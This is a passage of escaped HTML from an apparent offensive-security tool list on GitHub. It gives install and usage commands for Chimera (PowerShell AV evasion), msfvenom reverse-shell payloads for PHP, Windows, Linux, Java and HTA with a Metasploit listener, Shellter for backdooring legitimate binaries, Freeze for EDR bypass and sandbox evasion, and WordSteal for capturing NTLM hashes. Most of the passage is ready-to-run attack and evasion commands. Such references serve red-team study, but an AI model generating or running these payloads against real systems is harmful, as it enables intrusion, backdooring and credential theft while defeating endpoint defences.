It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get update \u0026amp;\u0026amp; sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https://github.com/tokyoneon/chimera /opt/chimera\nsudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/\nsudo chmod +x chimera.sh; ./chimera.sh --help\"\u003e\u003cpre\u003esudo apt-get update \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https://github.com/tokyoneon/chimera /opt/chimera\nsudo chown \u003cspan class=\"pl-smi\"\u003e$USER\u003c/span\u003e:\u003cspan class=\"pl-smi\"\u003e$USER\u003c/span\u003e -R /opt/chimera/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e /opt/chimera/\nsudo chmod +x chimera.sh\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e ./chimera.sh --help\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\"\u003e\u003cpre\u003e./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s 
length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.offensive-security.com/metasploit-unleashed/Msfvenom/\" rel=\"nofollow\"\u003emsfvenom\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-msfvenom\" class=\"anchor\" aria-label=\"Permalink: 🔙msfvenom\" href=\"#msfvenom\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMsfvenom allows the creation of payloads for various operating systems in a wide range of formats. 
It also supports obfuscation of payloads for AV bypass.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSet Up Listener\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"use exploit/multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST your-ip \nset LPORT listening-port \nrun\"\u003e\u003cpre\u003euse exploit/multi/handler \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e PAYLOAD windows/meterpreter/reverse_tcp \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LHOST your-ip \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LPORT listening-port \nrun\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eMsfvenom Commands\u003c/h4\u003e\u003ca id=\"user-content-msfvenom-commands\" class=\"anchor\" aria-label=\"Permalink: Msfvenom Commands\" href=\"#msfvenom-commands\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePHP:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R\"\u003e\u003cpre\u003emsfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eWindows:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p windows/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f exe \u0026gt; shell-x86.exe\"\u003e\u003cpre\u003emsfvenom -p windows/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f exe \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLinux:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p linux/x86/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f elf \u0026gt; shell-x86.elf\"\u003e\u003cpre\u003emsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f elf \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.elf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eJava:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"msfvenom -p java/jsp_shell_reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f raw \u0026gt; shell.jsp\"\u003e\u003cpre\u003emsfvenom -p java/jsp_shell_reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f raw \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell.jsp\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eHTA:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh \u0026gt; shell.hta\"\u003e\u003cpre\u003emsfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell.hta\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.shellterproject.com/\" rel=\"nofollow\"\u003eShellter\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-shellter\" class=\"anchor\" aria-label=\"Permalink: 🔙Shellter\" href=\"#shellter\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" 
height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eShellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull README information can be found \u003ca href=\"https://www.shellterproject.com/Downloads/Shellter/Readme.txt\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"apt-get update\napt-get install shellter\"\u003e\u003cpre\u003eapt-get update\napt-get install shellter\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit the \u003ca 
href=\"https://www.shellterproject.com/download/\" rel=\"nofollow\"\u003edownload page\u003c/a\u003e and install.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eJust pick a legit binary to backdoor and run Shellter.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome nice tips can be found \u003ca href=\"https://www.shellterproject.com/tipstricks/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLots of community usage demos can be found \u003ca href=\"https://www.shellterproject.com/shellter-community-demos/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.kali.org/tools/shellter/images/shellter.png\" rel=\"nofollow\"\u003ehttps://www.kali.org/tools/shellter/images/shellter.png\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/Freeze\"\u003eFreeze\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-freeze\" class=\"anchor\" aria-label=\"Permalink: 🔙Freeze\" href=\"#freeze\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 
2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFreeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/optiv/Freeze\ncd Freeze\ngo build Freeze.go\"\u003e\u003cpre\u003egit clone https://github.com/optiv/Freeze\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Freeze\ngo build Freeze.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\" -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. 
This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. Example 'notepad.exe' (default \u0026quot;notepad.exe\u0026quot;)\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. 
Example 'notepad.exe' (default \"notepad.exe\")\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.blackhatethicalhacking.com/tools/freeze/\" rel=\"nofollow\"\u003ehttps://www.blackhatethicalhacking.com/tools/freeze/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/0x09AL/WordSteal\"\u003eWordSteal\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-wordsteal\" class=\"anchor\" aria-label=\"Permalink: 🔙WordSteal\" href=\"#wordsteal\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 
1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis script will create a Microsoft Word Document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMicrosoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, the Net-NTLM challenge/response (commonly called the NTLM hash) that is sent when an authenticated victim opens the Word document and renders the image. The captured value can be cracked offline or relayed, but it is not directly usable for pass-the-hash, and the victim must be able to reach your listener over outbound SMB (TCP 445), which egress filtering commonly blocks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/0x09AL/WordSteal\ncd WordSteal\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/0x09AL/WordSteal\ncd WordSteal\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate document containing 'test.jpg' and start listener\n./main.py 127.0.0.1 test.jpg 1\n\n# Generate document containing 'test.jpg' and do not start listener\n./main.py 127.0.0.1 test.jpg 0\\n\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate document containing 'test.jpg' and start listener\u003c/span\u003e\n./main.py 127.0.0.1 test.jpg 1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate document containing 'test.jpg' and do not start listener\u003c/span\u003e\n./main.py 127.0.0.1 test.jpg 0\u003cspan 
class=\"pl-cce\"\u003e\\n\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/\" rel=\"nofollow\"\u003ehttps://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ntapi-undocumented-functions\" class=\"anchor\" aria-label=\"Permalink: 🔙NTAPI Undocumented Functions\" href=\"#ntapi-undocumented-functions\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis site 
provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003ehttp://undocumented.ntinternals.net/\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE\"\u003e\u003cimg 
